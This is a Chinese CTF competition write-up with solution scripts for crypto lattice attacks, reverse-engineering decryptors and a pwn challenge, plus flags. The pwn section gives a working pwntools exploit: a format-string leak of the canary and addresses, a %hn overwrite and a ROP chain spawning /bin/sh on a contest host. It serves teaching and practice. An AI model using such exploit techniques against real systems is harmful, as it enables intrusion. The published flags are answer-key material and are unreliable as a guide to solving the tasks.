![\"\"](\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2026\/03\/image.png\")
<\/div><\/figure>\n\n\n\n\u597d\u50cf\u526920\u5206\u949f \u653e\u9898 \u53ea\u80fd\u8bf4\u65e0\u8bed\u4e86\n\u8fd9\u4e48\u77ed\u7684\u65f6\u95f4\u89e3... \n\u5410\u69fd\u4e00\u4e0b \u8fd8\u6709\u4e3a\u4ec0\u4e48Pwn\u53ea\u6709\u4e00\u9053\u9898\u76ee \u9006\u5411\u53ea\u6709\u4e24\u9053\u9898\u76ee \u800c\u4e14\u4e0d\u96be \u6b63\u5e38\u4e0d\u5e94\u8be5\u90fd\u662f\u5747\u5206\u5417? Misc 5\u9053\u9898\u76ee.... \u91cc\u9762\u7684\u5185\u5e55\u6211\u4eec\u4e0d\u77e5\u9053\n\u800c\u4e14\u524d\u9762\u90fd\u662f\u5c01\u53f7 \u540e\u9762\u76f4\u63a5\u8b66\u544a\u4e86 \u8fd9\u662f\u4e3a\u4ec0\u4e48? \u54b3\u54b3\u54b3 \u5c31\u5f53\u6211\u6ca1\u6709\u8bf4\u5566!<\/code><\/pre>\n\n\n\n![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n\u524d\u9762\u5168\u662f\u5168\u89e3\u7684 \u5443\u5443\u5443\u5443\u5443 \u90fd\u662f\u6e56\u5317\u7684 \u8fd8\u6709 \u63d0\u4ea4{} \u91cc\u9762\u7684\u5185\u5bb9 \u5443\u5443\u5443\u5443 \u597d\u5427\u5c31\u602a\u6211\u6ca1\u6709\u770b\u5230\u5427\u89e3\u51fa\u6765\u63d0\u4ea4\u4e86\u597d\u51e0\u6b21 \u54b3\u54b3\u54b3<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u7b7e\u5230\u9898<\/h1>\n\n\n\n\u3010\u586b\u7a7a\u98981\u3011<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5728\u4eba\u5de5\u667a\u80fd\u548c\u673a\u5668\u5b66\u4e60\u9886\u57df\uff0c\u5bf9\u6297\u6837\u672c\u662f\u6307\u5728\u539f\u59cb\u6570\u636e\uff08\u5982\u56fe\u50cf\u3001\u6587\u672c\u6216\u97f3\u9891\uff09\u4e2d\uff0c\u901a\u8fc7\u4eba\u4e3a\u6545\u610f\u6dfb\u52a0\u7ec6\u5fae\u7684\u3001\u901a\u5e38\u662f\u8089\u773c\u96be\u4ee5\u5bdf\u89c9\u7684\u6270\u52a8\uff08\u566a\u58f0\uff09\uff0c\u4ece\u800c\u5bfc\u81f4\u667a\u80fd\u7b97\u6cd5\uff08\u5982\u6df1\u5ea6\u795e\u7ecf\u7f51\u7edc\uff09\u4ea7\u751f\u9519\u8bef\u5206\u7c7b\u6216\u9884\u6d4b\u7ed3\u679c\u7684\u6837\u672c\u3002\u8fd9\u7c7b\u6280\u672f\u5e38\u7528\u4e8e\u8bc4\u4f30\u6a21\u578b\u7684\u9c81\u68d2\u6027\u6216\u8fdb\u884c\u5b89\u5168\u653b\u51fb\u6d4b\u8bd5\u3002<\/code><\/pre>\n\n\n\n\u5bf9\u6297\u6837\u672c<\/code><\/pre>\n\n\n\n\u3010\u586b\u7a7a\u98982\u3011<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5b8c\u6574\u7684\u6807\u51c6\u540d\u79f0\u4e3a\uff1aISO\/SAE 21434 \u300a\u9053\u8def\u8f66\u8f86\u2014\u7f51\u7edc\u5b89\u5168\u5de5\u7a0b\u300b\uff08Road vehicles \u2014 Cybersecurity engineering\uff09\u3002<\/code><\/pre>\n\n\n\n21434<\/code><\/pre>\n\n\n\n\u3010\u586b\u7a7a\u98983\u3011<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5b8c\u6574\u7684\u53e5\u5b50\u4e3a\uff1a\u7269\u8054\u7f51\u8bbe\u5907\u7684\u5bc6\u94a5\u7ba1\u7406\u662f\u5b89\u5168\u9632\u62a4\u7684\u5173\u952e\u73af\u8282\u2026\u2026<\/code><\/pre>\n\n\n\n\u5bc6\u94a5<\/code><\/pre>\n\n\n\nCrypto<\/h1>\n\n\n\nFlip<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u9898\u76ee\u4e3a ElGamal\/DSA \u7b7e\u540d\u53d8\u4f53\u3002\u5728\u751f\u6210\u7b7e\u540d\u6240\u9700\u7684\u968f\u673a\u6570 k \u65f6\uff0c\u8c03\u7528\u4e86 flip(256)\u3002\u8be5\u51fd\u6570\u6bcf\u6b21\u751f\u6210\u7684 32 \u5b57\u8282\u4e2d\uff0c\u6bcf\u4e2a\u5b57\u8282\u7684\u524d 5 \u4e2a\u6bd4\u7279\u88ab\u56fa\u5b9a\u4e3a 10101\uff08\u5373\u5341\u8fdb\u5236 168\uff09\uff0c\u4ec5\u540e 3 \u4e2a\u6bd4\u7279\u662f\u968f\u673a\u7684\u3002\u8fd9\u662f\u4e00\u4e2a\u5178\u578b\u7684\u9690\u85cf\u6570\u95ee\u9898\uff08HNP\uff09\u3002\u901a\u8fc7\u5df2\u77e5\u7684\u9ad8\u4f4d\u7279\u5f81\uff0c\u8054\u7acb 5 \u7ec4\u7b7e\u540d\u65b9\u7a0b\u6d88\u9664\u79c1\u94a5 d\uff0c\u6211\u4eec\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a\u7ef4\u5ea6\u4e3a 165 \u7684\u77e9\u9635\uff0c\u5229\u7528 LLL \u7b97\u6cd5\u8fdb\u884c\u683c\u57fa\u89c4\u7ea6\uff0c\u5373\u53ef\u6c42\u51fa\u88ab\u9690\u85cf\u7684\u4f4e\u4f4d\u968f\u673a\u6570\uff0c\u8fd8\u539f k_0 \u5e76\u89e3\u51fa\u79c1\u94a5\uff08flag\uff09\u3002<\/code><\/pre>\n\n\n\nexp.py<\/p>\n\n\n\n
from Crypto.Util.number import long_to_bytes, inverse\nfrom sage.all import *\n\np = 71100374110712069688668891376502810245640088780564855438789152163485489371751\nsigs = [\n (28285613871231310640779639473901158789539111552315215487796222768188014946190, 26227626146853365468070394748025813676883717455365705026242089396817666141149), \n (26126343100952318312992351606027346470307966676167073519850533997742307763173, 14620119507969980035515863104967829444815591632534197769232561325577348982289), \n (6275780641102104914321094704687354889900656957520025439748906503860424049255, 17138154832682193571532283943639841813795519294633367500729430287205754722383), \n (70074830218018060401156682458161679247596227822712273801560023880579237944207, 7241759400261146571231207923652617524886465143836459562831120970876560955603), \n (58010164614616186321967235608825740148005793483553468415042960153988671899689, 11042506367122208018546854524444698969622593890076172637272391555458027253012)\n]\n\nK_base = sum(168 * (2**(8*j)) for j in range(32))\nS = sum(3 * (2**(8*j)) for j in range(32))\n\nA, B = [], []\nfor i in range(5):\n r, s = sigs[i]\n s_inv = inverse_mod(s, p)\n A.append((s_inv * r) % p)\n B.append((i * s_inv) % p)\n\nA0_inv = inverse_mod(A[0], p)\nC, D, E, F = [], [], [], []\nfor i in range(5):\n C.append((A[i] * A0_inv) % p)\n D.append((B[i] - C[i] * B[0]) % p)\n E.append((D[i] - K_base + C[i] * K_base) % p)\n F.append((E[i] - S + C[i] * S) % p)\n\nN = 165\nM = Matrix(ZZ, N, N)\nK_weight = 2**256 \n\nfor i in range(5):\n for j in range(32):\n r_idx = i * 32 + j\n M[r_idx, r_idx] = 1\n if i == 0:\n for eq in range(1, 5):\n val = (-C[eq] * (2**(8*j))) % p\n M[r_idx, 160 + eq - 1] = val * K_weight\n else:\n eq = i\n val = (2**(8*j)) % p\n M[r_idx, 160 + eq - 1] = val * K_weight\n\nfor eq in range(1, 5):\n M[160 + eq - 1, 160 + eq - 1] = p * K_weight\n\nM[164, 164] = 1\nfor eq in range(1, 5):\n val = (-F[eq]) % p\n M[164, 160 + eq - 1] = val * K_weight\n\nL = M.LLL()\n\nfor row in L:\n if abs(row[164]) == 1:\n if all(row[160+eq-1] == 0 for eq in range(1, 5)):\n if row[164] == -1:\n row = -row\n\n k0 = K_base\n for j in range(32):\n y_0j = row[j]\n x_0j = y_0j + 3\n k0 += x_0j * (2**(8*j))\n\n r0, s0 = sigs[0]\n d = ((s0 * k0) * inverse_mod(r0, p)) % p\n d_bytes = long_to_bytes(d)\n\n flag_inner = b\"\"\n for b in d_bytes:\n if 32 <= b <= 126:\n flag_inner += bytes([b])\n else:\n break\n\n print(\"DASCTF{\" + flag_inner.decode() + \"}\")\n break<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u53ea\u9700\u8981\u660e\u6587\u5c31\u884c<\/p>\n\n\n\n
Just_f3w_Bit5_fl1pp1ng<\/code><\/pre>\n\n\n\nGCD\uff0c\u6760\u4e0a\u4e86<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8003\u70b9<\/strong><\/p>\n\n\n\n\u591a\u9879\u5f0f\u8fd1\u4f3c\u6700\u5927\u516c\u7ea6\u6570 (ACD)<\/p>\n\n\n\n
LLL \u683c\u89c4\u7ea6\u7b97\u6cd5<\/p>\n\n\n\n
\u539f\u7406<\/strong>
$$
\u5206\u6790\u6839\u636e\u52a0\u5bc6\u811a\u672c\uff0c\u5df2\u77e5\u751f\u6210\u903b\u8f91\u4e3a x_i = p cdot q_i + e_i\u3002
$$<\/p>\n\n\n\n$$
\u5df2\u77e5 p \u7684\u957f\u5ea6\u4e3a 768 bits\uff0c\u8bef\u5dee e_i \u957f\u5ea6\u7ea6\u4e3a 256 bits\u3002\u7531\u4e8e e_i \u8fdc\u5c0f\u4e8e x_i\uff0c\u8fd9\u662f\u4e00\u9053\u5178\u578b\u7684\u8fd1\u4f3c\u6700\u5927\u516c\u7ea6\u6570\uff08ACD\uff09\u95ee\u9898\u3002
$$<\/p>\n\n\n\n
$$
\u901a\u8fc7\u4ea4\u53c9\u76f8\u4e58\u6d88\u9664 p\u3001\uff0c\u53ef\u5f97 q_0 x_i – q_i x_0 = q_0 e_i – q_i e_0\u3002
\u6784\u9020\u5982\u4e0b\u6b63\u4ea4\u683c\u77e9\u9635 M\uff0c\u4ee5\u6743\u91cd 2^{256} \u5bf9\u9f50\u6570\u636e\u91cf\u7ea7\uff1a
$$<\/p>\n\n\n\n
$$
M = begin{pmatrix} 2^{256} & x_1 & x_2 & x_3 0 & -x_0 & 0 & 0 0 & 0 & -x_0 & 0 0 & 0 & 0 & -x_0 end{pmatrix}
$$<\/p>\n\n\n\n
\u5bf9\u77e9\u9635\u8fdb\u884c LLL \u89c4\u7ea6\u540e\uff0c\u5728\u6700\u77ed\u5411\u91cf\u4e2d\u63d0\u53d6\u51fa
$$
q_0\uff0c\u5229\u7528 x_0 = p cdot q_0 + e_0 \u53cd\u6c42\u51fa p
$$
\u6700\u540e\u6309\u7167\u9898\u76ee\u8981\u6c42\u62fc\u63a5 SHA256 \u5373\u53ef\u5f97\u5230 flag\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import hashlib\n\nx0 = 7286602644894347905698877185006886062766603336098651145708618257426896498601438194818405176376998357154846239925108795918211744886731571266744871908463835351995189784312085830285088365342080806811314047882453402592133074499069282870744236160215512216478789267594028132748508140080189837224089073913522991827904722259140858601642592466315776021315586438508197663608590812749450817365064347439560883042009204050351693713820588889060849655679914847278675752145553961823946981967169055185529737402521407509263021789077125016742255715760\nx1 = 5230952259217719373451288600605694729007492237169927997823214951918450708970497355235418799314073627589124050832789070592194142892137496197782948844507440729494129127326826986001351848921996887252514377638280576136864865587600778883326741625167048874313825133026683820914940523608112111525189712638841735445342804486682657815023936771511350194415118747576763915047759919721983363867337811246200882629774305946208917774071048260034384488337583881876926649372038650806406479863141932268756290007122767070707541568217633666823942767630\nx2 = 6634396750920568285608095346195329118689097605994669634518316951192506731923068736273476052320642960726963932454848348066913054010051606781532862880707753022193473836326795829631429615685808176184842533562632931011621810840291571855376807721443083529317792844472049240727433533493468591987710033174905312247446273166915934371589745530975428330655972863314230695429710915699801228301493075605786710443768747383021956670013493099376120239576125225920151034511467122583704756994064073049424978126007943448882667862038745782477628408003\nx3 = 5206967518961960112660221968771713864784691153181370679825018817838185859421615186098940654940704354246503769468859488659689494119991783464734247926184421441233523723102514720513272413216800777125028472595562428391474002300021110853098159434700293331046532929525141162455736314162160456306022511785772125837018470201639642987557826155895644564724745314165471429499074795110110906392223770428469036209454246746770408469494816865235942622698472278595153047673886819995225231883995391098290313071949911543891398398297286813045525879691\n\nK = 2**256\nM = matrix(ZZ, [\n [K, x1, x2, x3],\n [0, -x0, 0, 0],\n [0, 0, -x0, 0],\n [0, 0, 0, -x0]\n])\n\nreduced_basis = M.LLL()\n\nfor row in reduced_basis:\n if row[0] != 0 and row[0] % K == 0:\n q0 = abs(row[0]) \/\/ K\n p_candidate = (x0 + q0 \/\/ 2) \/\/ q0\n\n if p_candidate.nbits() == 768:\n p = int(p_candidate)\n flag_hash = hashlib.sha256(hex(p).encode()).hexdigest()[:32]\n print(f\"DASCTF{{{flag_hash}}}\")\n break<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u6ca1\u6709\u683c\u5f0f<\/p>\n\n\n\n
\u7b54\u6848\u662f\u8fd9\u4e2a<\/p>\n\n\n\n
eead8ea2b3519a2273a5292375e31009<\/code><\/pre>\n\n\n\nPwn<\/h1>\n\n\n\nhouse_1<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u9644\u4ef6\u5185\u5bb9<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nnc<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8003\u70b9<\/strong><\/p>\n\n\n\n\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff08\u4efb\u610f\u8bfb\u3001\u4efb\u610f\u5199\uff09\n\u6808\u6ea2\u51fa\u6f0f\u6d1e \nCanary \u4e0e PIE \u4fdd\u62a4\u7ed5\u8fc7 \n\u7be1\u6539\u5168\u5c40\u53d8\u91cf\u6269\u5927\u8bfb\u53d6\u957f\u5ea6<\/code><\/pre>\n\n\n\n\u4fe1\u606f\u6cc4\u9732<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u5229\u7528\u9009\u9879 2 (`sub_135E`) \u5b58\u5728\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e `printf(buf)` \uff0c\u76f4\u63a5\u6253\u5370\u51fa\u6808\u4e0a\u7684 Canary\u3001PIE \u57fa\u5740\uff08\u7528\u4e8e\u8ba1\u7b97\u7a0b\u5e8f\u57fa\u5740\uff09\u4ee5\u53ca libc \u5185\u90e8\u5730\u5740\uff08\u7528\u4e8e\u8ba1\u7b97 libc \u57fa\u5740\uff09\u3002\n\n\u7be1\u6539\u5168\u5c40\u53d8\u91cf\uff1a\n\u518d\u6b21\u8c03\u7528\u9009\u9879 2\uff0c\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u7684\u4efb\u610f\u5199\u529f\u80fd\uff08\u5982 `%hn`\uff09\uff0c\u5c06\u63a7\u5236\u9009\u9879 3 \u8bfb\u53d6\u957f\u5ea6\u7684\u5168\u5c40\u53d8\u91cf `nbytes` \u4ece\u9ed8\u8ba4\u7684 `0x20` \u6539\u5199\u4e3a\u4e00\u4e2a\u8f83\u5927\u7684\u503c\uff08\u5982 `0x200`\uff09\n\nROP \u52ab\u6301\uff1a\n\u8c03\u7528\u9009\u9879 3 (`sub_12E5`)\uff0c\u6b64\u65f6 `read` \u51fd\u6570\u5141\u8bb8\u8bfb\u5165\u7684\u6570\u636e\u957f\u5ea6\u5df2\u8fdc\u8d85\u5c40\u90e8\u53d8\u91cf `buf` \u7684\u5927\u5c0f (`0x50` \u5b57\u8282) \u3002\u5411\u5176\u4e2d\u5199\u5165 padding\u3001\u6cc4\u9732\u51fa\u7684 Canary \u539f\u503c \uff0c\u5e76\u5728\u8fd4\u56de\u5730\u5740\u5904\u5e03\u7f6e ROP \u94fe\uff0c\u6700\u7ec8\u6267\u884c `system(\"\/bin\/sh\")`<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\nexp.py<\/p>\n\n\n\n
from pwn import *\n\nexe = ELF(\".\/pwn\")\nlibc = ELF(\".\/libc.so.6\")\ncontext.binary = exe\n\ndef conn():\n return remote(\"45.40.247.139\", 17730)\n\ndef main():\n r = conn()\n\n def change_name(name):\n r.sendlineafter(b\">> \", b\"2\")\n r.sendafter(b\"Please write your name:n\", name)\n r.recvuntil(b\"the name is:n\")\n return r.recvline()\n\n def edit_house(content):\n r.sendlineafter(b\">> \", b\"3\")\n r.sendafter(b\"Please write your contentn\", content)\n\n leak = change_name(b\"%13$p|%15$p|%21$p|\")\n leaks = leak.strip().split(b\"|\")\n\n canary = int(leaks[0], 16)\n pie_leak = int(leaks[1], 16)\n libc_leak = int(leaks[2], 16)\n\n exe.address = pie_leak - 0x147C\n libc.address = libc_leak - (libc.sym['__libc_start_main'] + 243)\n\n nbytes_addr = exe.address + 0x4010\n\n payload = b\"%512c%8$hn\".ljust(16, b'a') + p64(nbytes_addr)\n change_name(payload)\n\n rop = ROP(libc)\n rop.raw(rop.ret)\n rop.system(next(libc.search(b\"\/bin\/shx00\")))\n\n exploit = b\"A\" * 72\n exploit += p64(canary)\n exploit += b\"B\" * 8 \n exploit += rop.chain()\n\n edit_house(exploit)\n r.interactive()\n\nif __name__ == \"__main__\":\n main()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\nCOngratu1at1ons_ON_Get1ing_The_R1ght_HOUse<\/code><\/pre>\n\n\n\nREVERSE<\/h1>\n\n\n\n\u773c\u89c1\u4e3a\u865a_1<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n\u9644\u4ef6<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u901a\u8fc7IDA\u5b9a\u4f4d\u5230\u4e3b\u51fd\u6570 sub_401522 \u63a5\u6536\u8f93\u5165\uff0c\u6700\u540e\u5728 sub_402B68 \u8fdb\u884c\u5bc6\u6587\u6bd4\u5bf9\u3002\u4e2d\u95f4\u7684\u52a0\u5bc6\u8fc7\u7a0b\u4e3b\u8981\u7531\u4ee5\u4e0b\u51e0\u4e2a\u51fd\u6570\u6784\u6210\uff1a<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nsub_402A18\uff08\u5bc6\u94a5\u6d41\u751f\u6210\uff09\uff1a\u5185\u90e8\u662f\u4e00\u4e2a\u9b54\u6539\u7684TEA\u7b97\u6cd5\uff08\u5e26\u6709\u7279\u6b8a\u7684\u51cf\u6cd5\uff09\u3002\u4f46\u5b83\u4e0d\u52a0\u5bc6\u7528\u6237\u7684\u8f93\u5165\uff0c\u800c\u662f\u5bf9\u5185\u7f6e\u7684\u4e24\u4e2a\u5e38\u91cf\u8fdb\u884c32\u8f6e\u8fd0\u7b97\uff0c\u751f\u6210\u4e00\u4e2a\u56fa\u5b9a\u76848\u5b57\u8282\u5bc6\u94a5\u6d41\uff08KeyStream\uff09\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nsub_402D4C\uff08\u969c\u773c\u6cd5\uff09\uff1a\u4f2a\u4ee3\u7801\u663e\u793a\u5bf9\u8f93\u5165\u7684\u6bcf\u4e2a\u5b57\u7b26 + 22\u3002\u8fd9\u662f\u9898\u76ee\u7ed9\u7684\u5047\u5206\u652f\uff0c\u52a8\u6001\u8fd0\u884c\u4e2d\u88ab\u7ed5\u8fc7\u6216\u672a\u5b9e\u9645\u751f\u6548\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nsub_402AFC\uff08\u771f\u5b9e\u52a0\u5bc6\uff09\uff1a\u5c06\u8f93\u5165\u4e0e\u524d\u9762\u751f\u6210\u76848\u5b57\u8282\u5bc6\u94a5\u6d41\u8fdb\u884c\u5faa\u73af\u5f02\u6216\u3002\u5f02\u6216\u7684\u6761\u4ef6\u662f\u5bc6\u94a5\u6d41\u7684\u6bcf\u4e2a\u5b57\u8282\u5148 + 27\u3002<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u7a0b\u5e8f\u4e3b\u903b\u8f91\u5728 sub_401522\uff0c\u6700\u7ec8\u6bd4\u5bf9\u51fd\u6570\u4e3a sub_402B68\u3002\n\u5728 sub_402B68 \u4e2d\uff0c\u7528\u6237\u8f93\u5165\u88ab\u5904\u7406\u4e3a 40 \u5b57\u8282\u5927\u5c0f\uff0c\u5e76\u4e0e\u5185\u90e8\u6570\u7ec4 v2 \u9010\u5b57\u8282\u6bd4\u8f83\u3002v2 \u6570\u7ec4\u7684 10 \u4e2a _DWORD \u5e38\u91cf\u5c31\u662f\u771f\u5b9e\u5bc6\u6587\u3002IDA\u4e2d\u663e\u793a\u6709\u8d1f\u6570\uff0c\u8f6c\u4e3a\u65e0\u7b26\u53f7 32 \u4f4d\u6574\u6570\u5e76\u6309\u5c0f\u7aef\u5e8f\u62fc\u63a5\u540e\uff0c\u63d0\u53d6\u5230\u771f\u5b9e\u5bc6\u6587Hex\uff1a\n3356E8016F84E4A343738E265EF0FDA11575882008A4A6A5157588235DF0FAF04171DE7509A1F9E8<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u89e3\u5bc6\u601d\u8def<\/p>\n\n\n\n
\u771f\u5b9e\u7684\u52a0\u5bc6\u903b\u8f91\u4ec5\u4e3a sub_402AFC \u51fd\u6570\u4e2d\u7684\u6eda\u52a8\u5f02\u6216\uff1acipher[i] = flag[i] ^ (KeyStream[i % 8] + 27)\u3002\n\u63d0\u53d6\u5bc6\u6587\uff1a\u76f4\u63a5\u4ece sub_402B68 \u63d0\u53d6 v2 \u6570\u7ec4\u768410\u4e2a32\u4f4d\u6574\u6570\uff0c\u6309\u5c0f\u7aef\u5e8f\u8f6c\u6362\u63d0\u53d6\u51fa 40 \u5b57\u8282\u5bc6\u6587\u3002\n\u63d0\u53d6\u771f\u5b9e\u5bc6\u94a5\u6d41\uff1a\u901a\u8fc7\u52a8\u8c03 sub_402AFC\uff0c\u4ece\u5185\u5b58\u4e2dDump\u51fa\u771f\u5b9e\u8fd0\u884c\u65f6\u76848\u5b57\u8282\u5bc6\u94a5\u6d41 5CFCA02720A7847A\u3002\n\u8fd8\u539f\uff1a\u5bc6\u6587\u4e0e\u771f\u5b9e\u5bc6\u94a5\u6d41\uff08\u6bcf\u5b57\u8282\u52a027\u540e\uff09\u6309\u4f4d\u5f02\u6216\u3002<\/code><\/pre>\n\n\n\nexp.py<\/p>\n\n\n\n
import struct\n\ndef main():\n v2 = [\n 32003635, -1545304977, 646869827, -1577193378,\n 545813781, -1515805688, 596145429, -251989923,\n 1977512257, -386293495\n ]\n\n cipher = b\"\"\n for x in v2:\n cipher += struct.pack(\"<I\", x & 0xFFFFFFFF)\n\n keystream = bytes.fromhex(\"5CFCA02720A7847A\")\n\n flag = bytearray()\n for i in range(len(cipher)):\n c = cipher[i]\n k = (keystream[i % 8] + 27) & 0xFF\n flag.append(c ^ k)\n\n print(flag.decode('utf-8'))\n\nif __name__ == '__main__':\n main()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n64d5de2b4bb3b3f90bb3af2ee6fe72cf<\/code><\/pre>\n\n\n\neazy_code-new<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\n\u9898\u76ee\u7ed9\u51fa\u7684\u662f\u4e00\u6bb5\u9ad8\u5ea6\u6df7\u6dc6\u7684 PowerShell<\/strong> \u811a\u672c\uff0c\u5229\u7528\u53d8\u91cf\u81ea\u589e\u548c\u5b57\u7b26\u7d22\u5f15\u6784\u5efa\u6838\u5fc3\u903b\u8f91 \u3002\u901a\u8fc7\u5206\u6790\u5176\u53d8\u91cf\u5b9a\u4e49\u89c4\u5f8b\uff0c ${!;*}<\/code> \u7b49\u4ef7\u4e8e 1<\/code>\uff0c${]}<\/code> \u7b49\u4ef7\u4e8e 0<\/code> \u3002\u8be5\u811a\u672c\u6700\u7ec8\u901a\u8fc7 IEX<\/code> \u6267\u884c\u4e00\u6bb5\u7531 ASCII \u7801\u62fc\u63a5\u6210\u7684 Python \u4ee3\u7801 \u3002<\/p>\n\n\n\nPowerShell \u8fd8\u539f\u811a\u672c\uff1a<\/p>\n\n\n\n
`}':3,'${ ]}':4,'${!}':5,'${#.}':6,'${(}':7,'${)``}':8,'${``*%}':9} d = re.search(r'${@*} = \"(.*?)\"', c, re.S).group(1) for s, v in m.items(): d = d.replace(s, str(v)) print(\"\".join([chr(int(b.replace('${$%}',''))) for b in d.split('+') if b])) p_de('1.txt')<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\nclass chiper():\n def __init__(self):\n self.d = 0x87654321\n k0 = 0x67452301\n k1 = 0xefcdab89\n k2 = 0x98badcfe\n k3 = 0x10325476\n self.k = [k0, k1, k2, k3]\n\n def e(self, n, v):\n from ctypes import c_uint32\n\n def MX(z, y, total, key, p, e):\n temp1 = (z.value >> 6 ^ y.value << 4) + \n (y.value >> 2 ^ z.value << 5)\n temp2 = (total.value ^ y.value) + \n (key[(p & 3) ^ e.value] ^ z.value)\n return c_uint32(temp1 ^ temp2)\n key = self.k\n delta = self.d\n rounds = 6 + 52\/\/n\n total = c_uint32(0)\n z = c_uint32(v[n-1])\n e = c_uint32(0)\n\n while rounds > 0:\n total.value += delta\n e.value = (total.value >> 2) & 3\n for p in range(n-1):\n y = c_uint32(v[p+1])\n v[p] = c_uint32(v[p] + MX(z, y, total, key, p, e).value).value\n z.value = v[p]\n y = c_uint32(v[0])\n v[n-1] = c_uint32(v[n-1] + MX(z, y, total,\n key, n-1, e).value).value\n z.value = v[n-1]\n rounds -= 1\n return v\n\n def bytes2ints(self,cs:bytes)->list:\n new_length=len(cs)+(8-len(cs)%8)%8\n barray=cs.ljust(new_length,b'x00')\n i=0\n v=[]\n while i < new_length:\n v0 = int.from_bytes(barray[i:i+4], 'little')\n v1 = int.from_bytes(barray[i+4:i+8], 'little')\n v.append(v0)\n v.append(v1)\n i += 8\n return v\n\ndef check(instr:str,checklist:list)->int:\n length=len(instr)\n if length%8:\n print(\"Incorrect format.\")\n exit(1)\n c=chiper()\n v = c.bytes2ints(instr.encode())\n output=list(c.e(len(v),v))\n i=0\n while(i<len(checklist)):\n if i<len(output) and output[i]==checklist[i]:\n i+=1\n else:\n break\n if i==len(checklist):\n return 1\n return 0\n\nif __name__==\"__main__\":\n ans=[1374278842, 2136006540, 4191056815, 3248881376]\n # generateRes()\n flag=input('Please input flag:')\n res=check(flag,ans)\n if res:\n print(\"Congratulations, you've got the flag!\")\n print(\"Flag is DASCTF{your_input}!\")\n exit(0)\n else:\n print('Nope,try again!')<\/code><\/pre>\n\n\n\n\u7b97\u6cd5\u5206\u6790<\/p>\n\n\n\n
\u8fd8\u539f\u540e\u7684\u4ee3\u7801\u662f\u4e00\u4e2a\u9b54\u6539\u540e\u7684 XXTEA<\/strong> \u7b97\u6cd5 \uff1a<\/p>\n\n\n\nDelta: 0x87654321\nKey: [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]\nCiphertext: [1374278842, 2136006540, 4191056815, 3248881376]<\/code><\/pre>\n\n\n\n\u7f16\u5199\u9006\u5411\u89e3\u5bc6\u811a\u672c\uff0c\u5c06 total<\/code> \u4ece\u6700\u5927\u503c\u9012\u51cf\uff0c\u5e76\u53cd\u5411\u5904\u7406\u6570\u7ec4\u5143\u7d20 \u3002<\/p>\n\n\n\nexp.py<\/p>\n\n\n\n
from ctypes import c_uint32\n\ndef decrypt():\n v = [1374278842, 2136006540, 4191056815, 3248881376]\n k = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]\n delta = 0x87654321\n n = len(v)\n rounds = 6 + 52 \/\/ n\n total = c_uint32(rounds * delta)\n\n def MX(z, y, total, k, p, e):\n t1 = (z >> 6 ^ y << 4) + (y >> 2 ^ z << 5)\n t2 = (total ^ y) + (k[(p & 3) ^ e] ^ z)\n return (t1 ^ t2) & 0xffffffff\n\n while total.value != 0:\n e = (total.value >> 2) & 3\n y = v[0]\n for p in range(n - 1, 0, -1):\n z = v[p - 1]\n v[p] = (v[p] - MX(z, y, total.value, k, p, e)) & 0xffffffff\n y = v[p]\n z = v[n - 1]\n v[0] = (v[0] - MX(z, y, total.value, k, 0, e)) & 0xffffffff\n y = v[0]\n total.value -= delta\n\n flag = b\"\".join([i.to_bytes(4, 'little') for i in v])\n print(flag.decode().strip('x00'))\n\nif __name__ == \"__main__\":\n decrypt()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\nyOUar3g0oD@tPw5H<\/code><\/pre>\n\n\n\nMisc<\/h1>\n\n\n\nTime_and_chaos_1<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n<\/div><\/figure>\n\n\n\nflag.txt \u96f6\u5bbd\u89e3\u51fa \u6700\u540e\u7684flag<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n_time_fly}<\/code><\/pre>\n\n\n\n\u672c\u9898\u5c5e\u4e8e\u591a\u6e90\u9690\u5199\u62fc\u63a5\u9898\uff0c\u5b8c\u6574\u7684 flag 